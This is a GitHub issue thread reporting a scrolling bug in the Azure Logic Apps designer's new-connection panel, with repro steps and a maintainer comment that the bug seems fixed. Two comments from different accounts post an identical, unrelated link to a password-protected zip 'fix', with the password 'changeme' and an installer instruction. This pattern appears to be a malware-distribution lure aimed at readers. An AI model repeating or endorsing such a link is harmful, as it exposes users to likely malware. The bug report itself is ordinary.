### ISSUE TITLE
Scrolling up and down not working to add a new connection in API connections.

### ISSUE THREAD

**Issue by vgouth** [Azure/LogicAppsUX#5496]
### Describe the Bug with repro steps 

1\.Create a standard logic app.

 2\.Create a stateful/stateless workflow.

 3\.Add http request trigger.

 4\.Add send an email action.

5. Add new connection to send an email action. 

**Expected:** Scrolling up and down should facilitate adding a new connection in API connectors. This includes creating connections to Azure Function App, Managed API connections, etc. Although it doesn't affect functionality, it necessitates minimizing and maximizing the screen to continue.

**Actual:** It should work without minimizing the screen.

### What type of Logic App Is this happening in? 

Standard (Portal)

### Which operating system are you using? 

Windows

### Are you using new designer or old designer 

New Designer

### Did you refer to the TSG before filing this issue? [https://aka.ms/lauxtsg](<https://aka.ms/lauxtsg>) 

Yes

### Workflow JSON 

*No response*

### Screenshots or Videos 

![Screenshot (769)](<https://github.com/user-attachments/assets/407211d4-e0a4-448c-acb2-f3483fb8c136>)

![Screenshot (770)](<https://github.com/user-attachments/assets/316cc2ef-b0f1-4149-b775-2495fc138a8d>)

### Browser 

Edge

### Additional context 

**Version:** 2\.40826.1.3

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by preetriti1** [comment]
@DanielleCogs I think this seems to be fixed with Rileys change he made on Monday, deployment to staging went yesterday late night and vendors must have not able to test again.
